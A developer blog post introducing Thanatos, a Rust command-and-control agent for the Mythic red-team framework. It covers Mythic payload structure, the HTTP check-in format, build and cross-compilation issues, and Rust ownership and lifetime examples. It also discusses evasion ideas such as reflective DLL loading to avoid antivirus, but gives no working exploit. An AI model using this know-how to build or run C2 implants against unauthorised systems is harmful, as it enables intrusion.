Thanatos: A Mythic C2 Agent Written in Rust
This is part one of a series of blog posts on Thanatos, a cross-platform Mythic C2 agent written in Rust. This post will go over how the idea for this project came about and why Rust is a great language for offensive tooling development.
Part two of the series goes over setting it up in an Ubuntu VM and its functionality.
Project repository: https://github.com/MythicAgents/thanatos
Overview
- Background: Some background on what motivated this project and what this project is
- Why Mythic?: Advantages of using Mythic for a C2
- Mythic Payload Development: Development of a Mythic C2 agent
- Challenges: Challenges faced during development
- Offensive Capabilities: Ways Rust is an ideal language for offensive tooling
- Transitioning from C/C++ to Rust: Transitioning C/C++ concepts to Rust
- Development Plans: Future capabilities and development plans
Development
Background
Back in early 2021, I was having a discussion with Max Harley, a good friend of mine, about the Rust programming language. At that time, our knowledge of Rust was very limited but we both thought it was a really cool language and had plans of getting more familiar with it. Max decided to pitch the idea of writing a Mythic agent in Rust as a project for getting more familiar with the language. Due to the ease of cross-compiling Rust code, we also wanted to make the agent cross-platform. This did not seem like a difficult task since the Rust standard library can be compiled for both Linux and Windows without any modifications. Having a native C2 agent which could target both Linux and Windows allows a lot of flexibility due to it not requiring any runtime dependencies such as python or powershell.
So Max and I, with our very minimal knowledge of Rust, decided to start tackling this project of building a C2 agent for Mythic.
Why Mythic?
There are many C2 frameworks that already exist and include features for developing custom extensions and modules. Building custom extensions for these frameworks is great; however, I wanted to build a fully custom agent. There are not any or very few which allow developing custom fully custom agents. This was very limiting and the other option would be to develop a C2 framework from scratch for the agent. Writing a custom C2 server for the agent would mean that I would have to spend development time creating the server architecture instead of developing only the agent.
Mythic is very unique compared to other frameworks in the sense that it splits up design and functionality into three distinct parts. These parts are the server, the C2 profiles and the C2 agents. Due to this nature, profiles and agents can be developed separately from the server and then integrated into the platform. This design for a C2 framework is where Mythic really excels compared to other platforms. Developers have the freedom to create their own custom agents with unique capabilities for a central server. This allowed me to only focus on the agent aspects without needing to create my own custom framework. There are already great examples of the flexibility Mythic brings with this architecture. The MythicAgents Github organization contains a whole suite of custom agents ranging from fully featured .NET agents to Mac OS JXA agents. On top of custom C2 agents, there are examples of rather unique C2 profiles. The Orthrus agent uses Apple’s MDM to backdoor a Mac OS system and communicates using Apple Push Notifications and the Typhon agent is a malicious JAMF configuration which allows Mythic to act as a JAMF server in order to control JAMF enrolled devices. Mythic’s modularity allows for these fully custom payloads and profiles to be developed to work seamlessly with the Mythic server.
Mythic is the ideal framework for developing custom C2 tools and fits perfectly for my use case. It provides the flexibility for developing a custom agent without having to focus on the server aspects. Using Mythic for agent development is ideal when wanting to include custom payload functionality without creating my own server from scratch. Creating the server from scratch allows for flexibility on the design of the framework; however, it is not always viable to create a new framework from scratch.
Mythic Payload Development
Mythic payload type development is very well documented in the Mythic documentation. The first stage requires creating a directory structure for the agent.
.
├── agent_icons/
│ └── mypayload.svg
├── config.json
├── documentation-payload/
│ └── mypayload/
└── Payload_Type/
└── mypayload/
├── agent_code/
├── Dockerfile
├── mythic/
│ ├── agent_functions/
│ │ ├── builder.py
│ │ └── __init__.py
│ ├── browser_scripts/
│ ├── __init__.py
│ ├── mythic_service.py
│ ├── payload_service.sh
│ └── rabbitmq_config.json
└── requirements.txt
9 directories, 10 files
There are a few strict rules when it comes to file and directory names. For example: the
name of the directory under Payload_Type/*
has to be the name of the payload. The same
goes for documentation-payload/*
for documentation and agent_icons/*.svg
for the icon
of the agent. The example above assumes that the agent name is mypayload
.
Some of the files such as the mythic_service.py
and rabbitmq_config.json
file need to
be pre-populated according to the Mythic documentation or other payload types.
The config.json
file includes configuration options for the payload.
{
"exclude_payload_type": false,
"exclude_c2_profiles": true,
"exclude_documentation_payload": false,
"exclude_documentation_c2": true,
"exclude_documentation_wrapper": true,
"exclude_agent_icons": false
}
Since this is only a payload type and doesn’t include any custom C2 profiles, only the
exclude_payload_type
, exclude_documentation_payload
and exclude_agent_icons
fields
need to be set to false
.
Mythic functions using docker containers. The Payload_Type/mypayload/Dockerfile
file is
used to define the docker container the payload builder will use. There are
docker base images
already available which include dependencies for building different types of payloads but
a custom one can be defined. This docker container is used for building the payload; other
functions such as C2 communication are handled in profile containers.
The Payload_Type/mypayload/mythic/agent_functions/builder.py
file includes metadata
about the payload along with the implementation for building each payload. The
Mythic documentation
for this file includes a very in-depth guide on what to include in this file in order to
define your agent in Mythic along with how to compile build parameters into the payload.
I like to think of payload type development as containing “payload” code and “mythic”
code. The payload code is the code for the agent itself and lives in the
Payload_Type/mypayload/agent_code/
directory. The actual development of the agent and
its features occur here. The other part of the agent is the mythic code which is in the
Payload_Type/mypayload/mythic/agent_functions/
directory. Here is where various commands
are defined for the agent. This will define the commands and their parameters along with
any other pre-tasking before sending it down to the agent. The system for defining
commands in Mythic provides a vast set of features for the developer. Information about
adding different commands to Mythic can be found in the
documentation.
HTTP is a very common C2 communication transport and is one of the easiest to implement. Mythic already includes an HTTP C2 profile which can be used with an agent for C2 communications. This is a fairly straight forward profile which uses HTTP GET/POST requests and base64 encoded JSON data. The initial check in for an agent consists of an HTTP request with the following format.
Base64( PayloadUUID + JSON({
"action": "checkin", // required
"ip": "127.0.0.1", // internal ip address - required
"os": "macOS 10.15", // os version - required
"user": "its-a-feature", // username of current user - required
"host": "spooky.local", // hostname of the computer - required
"pid": 4444, // pid of the current process - required
"uuid": "payload uuid", //uuid of the payload - required
"architecture": "x64", // platform arch - optional
"domain": "test", // domain of the host - optional
"integrity_level": 3, // integrity level of the process - optional
"external_ip": "8.8.8.8", // external ip if known - optional
"encryption_key": "base64 of key", // encryption key - optional
"decryption_key": "base64 of key", // decryption key - optional
"process_name": "osascript", // name of the current process - optional
})
)
The PayloadUUID
is generated for each payload at compile time. An HTTP POST request with
this in the body of the request will register an initial check in with Mythic in the
callbacks page. Encryption can be included in the request payload by following the format
specified in the
documentation.
From here, an agent can be created by periodically beaconing back to the Mythic server to get tasking and sending the results of completed tasking back.
This goes over the start of building a basic Mythic payload. Creating more advanced commands can be found through the Mythic documentation. The example does not go into depth about all of the other great capabilities included with Mythic. Mythic provides support for registering new commands with a callback. An example can be where an agent loads a DLL during runtime and commands with Mythic can be registered in order to interact with that newly loaded DLL. The Medusa agent includes this capability. Mythic also supports a structure for peer-to-peer communications between agents. An agent can communicate with other agents directly in order to pass on tasking. The Apollo and Poseidon agents support p2p functionality through SMB and/or TCP.
Challenges
There were a few issues faced when developing the agent. These issues were not necessarily design issues but were due to how the Rust programming language is designed and what capabilities I wanted to include into the agent.
The first major issue was compile times. Compiling Rust programs by themselves isn’t slow;
however, the way Rust handles compiling and linking dependencies can drastically increase build times.
Dependencies for a Rust project are defined in a Cargo.toml
file in the root of the
project directory. When the project is compiled, each dependency is pulled down and then
compiled separately from the main project source and then linked together. Builds are
incremental so once the dependencies are compiled in the project, each subsequent build
will only build the source code for the main project and link the built dependencies. An
initial build of a project may take around 40 seconds to download and compile all of the
dependencies whereas subsequent builds only take around 0.3 seconds. This dependency
management system works very well; however, it is per-project. If you have two Rust
projects that both rely on the same library, each project will compile the library and
store the built library in their project directory. On top of this, dependencies will also
be built according to what target the project is building for. If a project was built for
64 bit Linux, a subsequent 32 bit Linux build will require rebuilding all of the
dependencies for 32 bit.
How does this relate to Thanatos? Initially, Thanatos would not do any special dependency caching. This meant that each time a new payload was built, the dependencies for the payload were compiled each time. Build times would average around 30 seconds to a minute each build depending on system resources. To solve this issue, the payload builder will cache dependencies after the first build for the target platform. An initial build of a Linux 64 bit payload will compile all of the dependencies for 64 bit Linux and then cache them for future builds. This allows for the build times of subsequent builds to be significantly reduced. This design was used to help reduce the size of the docker image. The docker image could already include pre-built dependencies but that would mean there would need to be Windows/Linux 64 and 32 bit targets along with statically linked Linux builds. If an operation does not require Linux agents, then the libraries would take up a lot of unnecessary hard drive space.
The second issue was cross-compilation. Rust by itself has incredible cross-compilation capabilities; however, those can be affected when introducing dependencies which require C development libraries. The ssh2 library that Thanatos uses for SSH requires openssl. When compiling for Windows targets, an openssl library compatible with mingw is needed. There also needs to include both 32 bit and 64 bit builds. One of my options to fix this was by cross-compiling openssl for each platform I needed and then including that inside the docker container. It wasn’t an ideal fix for the issue but it would make the agent compile. I found out that the Fedora docker base image included all of the dependencies I needed inside the repositories so I ended up using Fedora for the docker base image.
One of the other influencers for using Fedora for the docker base image was due to Windows 32 bit builds. I was having a fair bit of difficulty getting Windows 32 bit Rust binaries built in Ubuntu docker containers which I tracked down to being an issue with the mingw32 compiler included in the Ubuntu repository. The mingw32 compiler in the Ubuntu repositories comes with an option compiled in which uses a linker not compatible with Rust’s libunwind. This was a major hindrance which meant that Thanatos could not target Windows 32 bit platforms. Building 32 bit Windows binaries would allow for injecting the payload into 32 bit processes so it would be a nice feature to include. Luckily, the mingw32 compiler in Fedora did not enable this feature and allowed building 32 bit Windows payloads.
Rust Programming Language
Offensive Capabilities
Digging more into Rust, I was blown away by the offensive capabilities it can provide. Rust can be thought of, at a high level, as a language which bridges the gap between low-level systems development through direct memory manipulation and high-level development such as manipulating JSON. Rust has the ability to work with raw pointers and manipulate memory very similar to C/C++. There may be times where a DLL needs to be loaded reflectively in either the current process or another process. Rust can parse the DLL headers and resolve all the symbols in the same way that C/C++ can. Reflectively loading a DLL means that the DLL does not touch the hard disk of the target system which can trigger AV or EDR depending on what the DLL is. Rust even supports inline assembly. This allows offensive tool developers very fine control over what executes in their program. Golang can use pointers but they don’t provide the same level of control as Rust. Golang gets around this by writing the low-level memory code in C and then using the Golang C ffi to invoke those C functions. Rust does not need to rely on C for any low-level memory management.
As mentioned, Rust is used for bridging the gap between low-level systems development and
high-level development. Working with JSON Rust using the
serde_json library is very similar to working with JSON in
Golang. There are many different HTTP libraries available with many including async
support. Using an HTTP library such as reqwest
makes sending HTTP requests and returning
the output as simple as
[dependencies]
reqwest = { version = "0.11", features = ["blocking"] }
fn main() {
let data = reqwest::blocking::get("http://example.com")
.unwrap()
.text()
.unwrap();
println!("{}", data);
}
No need to initialize an HTTP handle or manually allocate memory.
Libraries not only make the development process easier but the language provides various functional features which can help reduce the amount of code needed to do various tasks. The standard library is very extensive and almost always includes some way of doing a very specific task in an elegant manner.
A few great resources on Rust being used for offensive tooling worth checking out are Black Hat Rust and Offensive Rust.
Transitioning From C/C++ to Rust
There have been many situations I have found where I can ditch C/C++ for a project and use Rust instead. Rust can do anything I need which C/C++ can do while also bringing memory safety. C and C++ have a history of being the root cause for many different memory corruption vulnerabilities that exist even today. This is partly due to the developers writing software which contains bugs and partly due to the fact that C/C++ do not prevent people from writing software which could introduce a memory corruption vulnerability.
This is why Rust is a great language for C/C++ developers who want to write secure code while keeping the same performance and low-level properties of C/C++. There are a few things that tripped me up when transitioning from C/++ to Rust.
The Rust compiler features a borrow checker which can be a little frustrating to get used to at first. The idea behind the borrow checker is to prevent pointer aliasing and shared mutability. Here are two examples to demonstrate ownership and borrowing.
fn main() {
let a = "Hello World".to_string();
let b = a; // 'a' variable is moved to 'b'
println!("{}", a); // since 'a' was moved to 'b', 'a' is no longer valid
}
This example will not compile. The a
variable contains a heap allocated string "Hello World"
. The b
variable is now being assigned to the a
variable and the a
variable
is being printed out. C/C++ will treat a
and b
as pointers to the same heap allocated
string "Hello World"
. This results in a
and b
pointing to the same area of memory
which can result in unsafe behavior. Other languages such as Golang or Python will make a
copy of the string whenever it gets assigned to the b
variable. Since heap allocations
can be relatively expensive computationally, Rust won’t implicitly allocate memory and
store a new copy of the string but instead throw a compile error.
fn main() {
let a = "Hello World".to_string();
let b = &a; // 'b' is now a reference to 'a'
println!("{}", a); // Since 'b' is a reference to 'a', 'a' is still valid
}
This example does compile because the ownership of the heap allocation containing the string
"Hello World"
isn’t being passed to the b
variable but instead, b
is now borrowing
the string from a
. This may seem like a basic concept; however, it can become very
tedious when applying it.
Lifetimes exist in C/C++ but they are more verbose in Rust. Lifetimes are the idea that when a variable refers to another piece of data, that data will exist in the program as long as any references to that variable. Lifetimes in Rust can get a little bit ugly but knowing how and when to use them can help make them easier to read.
fn main() {
let a: String = "Hello World".to_string(); // "Hello World" is a heap allocated string
let b: &str = a.as_str(); // refers to the heap allocated string directly
println!("{}", b);
}
I included types for the variables to make the program logic a little easier to understand. The b
variable refers to the "Hello World"
string by reference. This is valid but what happens
if the "Hello World"
string gets deallocated?
fn main() {
let a: String = "Hello World".to_string(); // "Hello World" is a heap allocated string
let b: &str = a.as_str(); // refers to the heap allocated string directly
drop(a); // Deallocate the "Hello World" string
println!("{}", b);
}
This obviously won’t work because b
is now a reference to memory which was deallocated.
Lifetime issues become clearer when working with structures.
struct MyStruct {
field1: &str
}
fn main() {
let b = "Hello World";
let a = MyStruct {
field1: "Hello World",
};
println!("{}", a.field1);
}
This example won’t compile because it is not guaranteed that every time MyStruct
is
created the string field1
refers to will be valid. &str
can be thought of as a string
literal and not a heap allocated string. This is where a lifetime parameter is needed.
struct MyStruct<'a> {
field1: &'a str
}
fn main() {
let b = "Hello World";
let a = MyStruct {
field1: b,
};
println!("{}", a.field1);
}
This does compile because the 'a
lifetime sends a hint to the compiler that any value
which field1
refers to has to live as long as the structure itself.
Future Improvements
Development Plans
The agent is far from finished and development will continue to happen. This initial release should be thought of as a beta test for the agent to see what areas could be improved and to fix any potential bugs. The agent hasn’t been thoroughly tested so there are most-likely issues that will arise. New feature development is going to focus on areas which have a potential of affecting the overall structure of the agent. The reasoning behind this is due to the potential of having to rewrite the agent, or most of it, to include a certain feature. Rewriting the agent would not be a huge setback now; however, if miscellaneous features are added before the structure isn’t solidified, a rewrite would take a lot more time.
The three most important features which could potentially require restructuring the code base of the agent are: integration of multiple C2 profiles, socks proxying through the agent and p2p C2 profiles. Once the overall structure of the agent is completely figured out, it should make adding various commands a matter of implementing the code which accomplishes the task.